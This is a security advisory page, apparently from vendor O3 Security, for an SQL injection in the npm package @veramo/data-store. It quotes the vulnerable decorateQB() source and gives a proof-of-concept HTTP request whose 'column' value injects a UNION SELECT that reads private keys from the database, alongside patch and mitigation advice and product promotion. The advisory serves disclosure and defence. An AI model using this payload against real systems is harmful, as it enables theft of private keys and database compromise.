How severe is GHSA-38cw-85xc-xr9x?

GHSA-38cw-85xc-xr9x has a CVSS score of 6.8/10, rated MEDIUM. Review your exposure and patch according to your risk tolerance.

Which packages are affected by GHSA-38cw-85xc-xr9x?

GHSA-38cw-85xc-xr9x affects the following packages: @veramo/data-store (npm). Ecosystems affected: npm.

How do I fix GHSA-38cw-85xc-xr9x?

Update @veramo/data-store to 6.0.2 or later, then make sure no transitive (indirect) dependency still pins the vulnerable range — O3 confirms GHSA-38cw-85xc-xr9x is resolved across your whole dependency graph.

How do I detect GHSA-38cw-85xc-xr9x in my npm dependencies?

Scan your dependency tree (package-lock.json, pnpm-lock.yaml, requirements.txt, go.sum, etc.) for @veramo/data-store. O3's reachability analysis confirms whether the vulnerable code path is actually invoked in your application, so you act on real exposure instead of every transitive match.

How do I mitigate GHSA-38cw-85xc-xr9x if there is no patch (or I can't update yet)?

If you can't upgrade right away: gate or disable the affected feature, validate untrusted input at the boundary, and avoid passing attacker-controlled data into the vulnerable path. O3's runtime protection blocks exploitation in production as an interim safeguard until the upgrade lands.

How does O3 Security protect against GHSA-38cw-85xc-xr9x?

O3 pinpoints whether GHSA-38cw-85xc-xr9x is reachable in your code and exactly where to fix it, then blocks exploitation in production at runtime until the patched version is deployed.

Is GHSA-38cw-85xc-xr9x actively exploited in the wild?

No public exploit code has been indexed for GHSA-38cw-85xc-xr9x yet. This does not mean the vulnerability cannot be exploited — absence of public exploits does not imply safety. Apply the recommended fix and use O3 Security to monitor your exposure.

When was GHSA-38cw-85xc-xr9x published, and has it been updated?

GHSA-38cw-85xc-xr9x was published on January 16, 2026 and was last updated on February 3, 2026. Advisory data evolves as severity scores, affected ranges, and exploit intelligence are revised — always check the latest version of the advisory before acting.

📦 npm

GHSA-38cw-85xc-xr9x

MEDIUM

Veramo is Vulnerable to SQL Injection in Veramo Data Store ORM

Published

Jan 16, 2026

Updated

Feb 3, 2026

Affected

1 pkg

Patched

1 / 1

Exploits

None indexed

Blast Radius

1 pkg affected

📦@veramo/data-store

Real-time download stats are indexed for npm and PyPI packages. This vulnerability affects npm packages — download data is not available via public APIs for these ecosystems.

Description

Summary

An SQL injection vulnerability exists in the @veramo/data-store package that allows any authenticated user to execute arbitrary SQL queries against the database. The vulnerability is caused by insufficient validation of the column parameter in the order array of query requests.

Details

packages/data-store/src/data-store-orm.ts (lines 416-434)

The vulnerability exists in the decorateQB() function which processes query ordering parameters:

function decorateQB(
  qb: SelectQueryBuilder<any>,
  tableName: string,
  input: FindArgs<any>,
): SelectQueryBuilder<any> {
  if (input?.skip) qb = qb.offset(input.skip)
  if (input?.take) qb = qb.limit(input.take)

  if (input?.order) {
    for (const item of input.order) {
      qb = qb.addSelect(
        qb.connection.driver.escape(tableName) + '.' + qb.connection.driver.escape(item.column),
        item.column,
      )
      qb = qb.orderBy(qb.connection.driver.escape(item.column), item.direction)
    }
  }
  return qb
}

Root Cause:

The item.column value from user input is passed directly as the alias parameter to addSelect() without any sanitization or validation
While TypeScript defines allowed column types (e.g., TCredentialColumns = 'context' | 'type' | ...), this is only compile-time checking
At runtime, the function accepts FindArgs<any>, allowing arbitrary strings to bypass type restrictions
TypeORM inserts the alias directly into the SQL query, enabling SQL injection

Affected Endpoints:

All endpoints are located in packages/data-store/src/data-store-orm.ts:

Endpoint	Method	Line
`dataStoreORMGetIdentifiers`	identifiersQuery()	85-98
`dataStoreORMGetMessages`	messagesQuery()	129-153
`dataStoreORMGetVerifiableCredentialsByClaims`	claimsQuery()	168-198
`dataStoreORMGetVerifiableCredentials`	credentialsQuery()	227-252
`dataStoreORMGetVerifiablePresentations`	presentationsQuery()	275-297

All these methods call decorateQB() which processes the vulnerable order parameter.

PoC

Prerequisites:

A running Veramo agent with the REST API exposed (e.g., via @veramo/remote-server)
Valid authentication credentials (Bearer token)
The agent uses @veramo/data-store with a SQLite or compatible database

Example Exploit to Extract Private Keys From DB:

POST /agent/dataStoreORMGetVerifiableCredentialsByClaims HTTP/1.1
Host: localhost:3332
Content-Length: 811
Authorization: Bearer test123
Content-Type: application/json

{ "where":[
    {
      "value": [
        "string"
      ],
      "not": true,
      "op": "foo",
"column":"bar"
    }
  ],
 
  "skip": 0,
  "take": 11111232323230,
"order": [
    {
      "direction": "ASC","column":"issuanceDate\" AS \"issuanceDate\" FROM \"claim\" \"claim\" LEFT JOIN \"identifier\" \"issuer\" ON \"issuer\".\"did\"=\"claim\".\"issuerDid\"  LEFT JOIN \"identifier\" \"subject\" ON \"subject\".\"did\"=\"claim\".\"subjectDid\"  LEFT JOIN \"credential\" \"credential\" ON \"credential\".\"hash\"=\"claim\".\"credentialHash\" where not(claim.isObj in (?)) and 1=0 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,(SELECT json_object('alias', alias, 'type', type, 'privateKeyHex', privateKeyHex) ),22,23,24,25,26,27,28,29 from `private-key`-- -"
    }
  ]
}

similar exploit could be used against the other affected endpoints

Impact

Attack capabilities:

Complete database read access
Reading or write files into fs depending on dbms used
Database-specific escalation paths
Dos through timebased or multiple long running queries

Affected Packages

1 total 1 fixed

Ecosystem	Package	Vulnerable range	Fix
📦npm	`@veramo/data-store`	all versions	6.0.2

Detection & mitigation playbook

Open-source dependency

Detect
Scan your dependency tree (package-lock.json, pnpm-lock.yaml, requirements.txt, go.sum, etc.) for @veramo/data-store. O3's reachability analysis confirms whether the vulnerable code path is actually invoked in your application, so you act on real exposure instead of every transitive match.
Fix
Update @veramo/data-store to 6.0.2 or later, then make sure no transitive (indirect) dependency still pins the vulnerable range — O3 confirms GHSA-38cw-85xc-xr9x is resolved across your whole dependency graph.
Workarounds
If you can't upgrade right away: gate or disable the affected feature, validate untrusted input at the boundary, and avoid passing attacker-controlled data into the vulnerable path. O3's runtime protection blocks exploitation in production as an interim safeguard until the upgrade lands.
How O3 protects you
O3 pinpoints whether GHSA-38cw-85xc-xr9x is reachable in your code and exactly where to fix it, then blocks exploitation in production at runtime until the patched version is deployed.

Tailored to GHSA-38cw-85xc-xr9x. Runtime protection reduces exposure until a permanent patch is applied and verified — it complements patching, it doesn't replace it.

Frequently Asked Questions

## Summary An SQL injection vulnerability exists in the `@veramo/data-store` package that allows any authenticated user to execute arbitrary SQL queries against the database. The vulnerability is caused by insufficient validation of the `column` parameter in the `order` array of query requests. ## Details `packages/data-store/src/data-store-orm.ts` (lines 416-434) The vulnerability exists in the `decorateQB()` function which processes query ordering parameters: ```typescript function decorateQB( qb: SelectQueryBuilder<any>, tableName: string, input: FindArgs<any>, ): SelectQueryBuil

O3 Security · Impact-Aware SCA

Is GHSA-38cw-85xc-xr9x in your dependencies?

O3 detects GHSA-38cw-85xc-xr9x across npm dependencies and uses function-level reachability to confirm whether the vulnerable code path is actually reachable — not just present. No false positives.

Scan my dependencies How O3 SCA works